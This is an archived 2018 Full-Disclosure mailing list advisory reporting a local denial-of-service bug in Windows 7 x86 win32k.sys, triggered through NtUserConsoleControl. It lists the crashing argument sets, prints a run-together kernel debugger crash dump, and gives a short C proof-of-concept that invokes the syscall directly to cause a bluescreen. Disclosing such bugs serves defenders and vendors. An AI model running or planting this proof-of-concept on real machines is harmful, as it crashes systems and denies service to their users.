| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 29 Jun 2018 12:42:00 +0200
From: Victor Portal Gonzalez <vportalg@...il.com>
To: fulldisclosure@...lists.org, bugtraq@...urityfocus.com
Subject: [FD] Windows Kernel (win32k.sys) Local Denial Of Service
Hello,
It is possible to trigger a BSOD caused by a Null pointer deference when
calling the system call NtUserConsoleControl with the following arguments:
- NtUserControlConsole(1,0,8).
- NtUserControlConsole(4,0,8).
- NtUserControlConsole(6,0,12).
- NtUserControlConsole(2,0,12).
- NtUserControlConsole(3,0,20).
- NtUserControlConsole(5,0,8).
Different crashes are reproduced for each case. For the second case the
crash is showed below:
*EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - La instrucci n en 0x%08lx hace
referencia a la memoria en 0x%08lx. La memoria no se pudo %s.FAULTING_IP:
win32k!xxxSetConsoleCaretInfo+*
*c93310641 8b0e mov ecx,dword ptr [esi]TRAP_FRAME: 8c747b2c
-- (.trap 0xffffffff8c747b2c)ErrCode = 00000000eax=00000000 ebx=00000000
ecx=84fc9100 edx=00000000 esi=00000000 edi=00000003eip=93310641
esp=8c747ba0 ebp=8c747bb0 iopl=0 nv up ei ng nz ac po nccs=0008
ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010292win32k!xxxSetConsoleCaretInfo+*
*0xc:93310641 8b0e mov ecx,dword ptr [esi]
ds:0023:00000000=????????Resetting default scopeCUSTOMER_CRASH_COUNT:
1DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULTBUGCHECK_STR: 0x8EPROCESS_NAME:
Win32k-fuzzer_CURRENT_IRQL: 0LAST_CONTROL_TRANSFER: from 9330fc27 to
93310641STACK_TEXT: 8c747bb0 9330fc27 00000000 00000003 00000014
win32k!xxxSetConsoleCaretInfo+*
*0xc8c747bcc 9330fa8d 00000003 00000000 00000014
win32k!xxxConsoleControl+0x1478c747c20 82848b8e 00000003 00000000 00000014
win32k!NtUserConsoleControl+*
*0xc58c747c20 012e6766 00000003 00000000 00000014
nt!KiSystemServicePostCallWARNING: Frame IP not in any known module.
Following frames may be wrong.0016f204 00000000 00000000 00000000 00000000
0x12e6766STACK_COMMAND: kbFOLLOWUP_IP: win32k!xxxSetConsoleCaretInfo+*
*c93310641 8b0e mov ecx,dword ptr [esi]SYMBOL_STACK_INDEX:
0SYMBOL_NAME: win32k!xxxSetConsoleCaretInfo+*
*cFOLLOWUP_NAME: MachineOwnerMODULE_NAME: win32kIMAGE_NAME:
win32k.sysDEBUG_FLR_IMAGE_TIMESTAMP: 5accdebcFAILURE_BUCKET_ID:
0x8E_win32k!*
*xxxSetConsoleCaretInfo+cBUCKET_ID: 0x8E_win32k!*
*xxxSetConsoleCaretInfo+cFollowup: MachineOwner---------kd> r
esiesi=00000000*
*PoC code:*
*#include <Windows.h>*
*extern "C"*
*ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {*
* __asm{mov eax, ApiNumber};*
* __asm{lea edx, ApiNumber + 4};*
* __asm{int 0x2e};*
*}*
*int _tmain(int argc, _TCHAR* argv[])*
*{*
* int st = 0;*
* int syscall_ID = 0x1160; //NtUserControlConsole Windows 7*
*LoadLibrary(L"user32.dll");*
* st = (int)SystemCall32(syscall_ID, 4, 0, 8);*
* return 0;*
*}*
The vulnerability has only been tested in Windows 7 x86.
CVSS Base Score: 5.5
As the vulnerability not meet the bar that Microsoft has for servicing, not
patch will be released.
Best regards,
Victor Portal
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists